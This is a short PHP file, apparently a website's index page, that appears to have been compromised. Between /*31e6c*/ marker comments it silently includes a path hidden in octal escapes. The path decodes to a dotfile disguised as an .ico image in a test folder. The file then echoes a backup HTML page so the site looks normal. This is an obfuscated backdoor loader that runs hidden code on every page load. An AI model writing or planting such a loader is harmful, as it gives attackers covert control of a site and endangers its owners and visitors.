<?php
/*31e6c*/

@include "\057h\157m\1453\057v\062r\164e\163t\145r\057p\165b\154i\143_\150t\155l\057a\164t\145n\144a\156c\145-\163h\145e\164/\164e\163t\163/\106e\141t\165r\145/\0563\146a\0612\0673\062.\151c\157";

/*31e6c*/


echo @file_get_contents('index.html.bak.bak');